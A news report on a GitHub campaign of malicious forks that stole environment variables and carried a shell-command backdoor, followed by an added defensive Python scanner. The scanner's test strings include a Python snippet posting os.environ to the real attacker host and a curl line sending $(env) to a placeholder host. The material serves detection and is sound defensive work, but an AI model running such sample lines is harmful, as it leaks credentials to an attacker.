A wave of forks with malicious changes has been recorded on GitHub

GitHub has identified a campaign of mass-created forks and clones of popular projects, with malicious changes, including a backdoor, introduced into the copies. A search for the host name (ovz1.j19544519.pr46m.vps.myjino.ru) contacted by the malicious code turned up more than 35 thousand changes on GitHub, present in clones and forks of various repositories, including forks of crypto, golang, python, js, bash, docker and k8s projects.

The attack relies on users not checking for the original project and taking code from a fork or clone with a slightly different name instead of the main project repository. GitHub has already removed most of the forks carrying the malicious insertion. Users who reach GitHub from search engines are advised to carefully verify a repository's relationship to the main project before using code from it.

The added malicious code sent the contents of environment variables to an external server, with the aim of stealing AWS and continuous-integration tokens. In addition, a backdoor was integrated into the code that runs shell commands returned in response to a request to the attacker's server. Most of the malicious changes were added between 6 and 20 days ago, but there are individual repositories where the malicious code can be traced back to 2015.
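A defender-side triage check for the behaviour described above, as an added example that is not from the article or from GitHub's own tooling: it scans a checked-out fork for the host name the article cites and for a crude heuristic (reading the whole environment within a few lines of a network call). The heuristic patterns, the `scan_text`/`scan_repo` names and the sample snippets are constructed assumptions, not artefacts from the campaign.

```python
import re
from pathlib import Path

# Host name quoted in the article; further indicators would be appended here.
IOC_HOSTS = ("ovz1.j19544519.pr46m.vps.myjino.ru",)

# Crude heuristic (assumption): code that reads the whole environment ...
ENV_DUMP = re.compile(r"os\.environ\b|process\.env\b|printenv|\$\(env\)")
# ... within WINDOW lines of something that talks to the network.
NET_CALL = re.compile(r"urlopen|requests\.(post|get)|http\.client|\bcurl\b|\bwget\b|fetch\(")
WINDOW = 5
SKIP_DIRS = {".git", "node_modules", "vendor"}


def scan_text(text, path="<memory>"):
    """Return (path, line_no, kind, detail) tuples for one file's contents."""
    lines = text.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        for host in IOC_HOSTS:
            if host in line:
                findings.append((path, idx + 1, "ioc-host", host))
        if ENV_DUMP.search(line):
            lo, hi = max(0, idx - WINDOW), min(len(lines), idx + WINDOW + 1)
            if any(NET_CALL.search(l) for l in lines[lo:hi]):
                findings.append((path, idx + 1, "env-exfil-heuristic", line.strip()))
    return findings


def scan_repo(root):
    """Walk a checked-out repository and scan every non-binary file."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file() or any(part in SKIP_DIRS for part in p.parts):
            continue
        data = p.read_bytes()
        if b"\0" in data:  # skip binaries
            continue
        findings.extend(scan_text(data.decode("utf-8", "replace"), str(p)))
    return findings


# Constructed samples resembling the behaviour the article describes.
SAMPLE_MALICIOUS = '''import os, urllib.request
payload = str(dict(os.environ)).encode()
urllib.request.urlopen("http://ovz1.j19544519.pr46m.vps.myjino.ru/", data=payload)
'''
SAMPLE_SHELL = 'curl -s -d "$(env)" http://evil.example/collect\n'  # placeholder host
SAMPLE_BENIGN = '#!/usr/bin/env python3\nprint("hello")\n'

if __name__ == "__main__":
    for f in scan_text(SAMPLE_MALICIOUS) + scan_text(SAMPLE_SHELL):
        print(f)
```

A match on the host name is a hard indicator; the heuristic only flags candidates for manual review, so run it on the fork and diff against the upstream repository before trusting the code.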

Source: opennet.ru
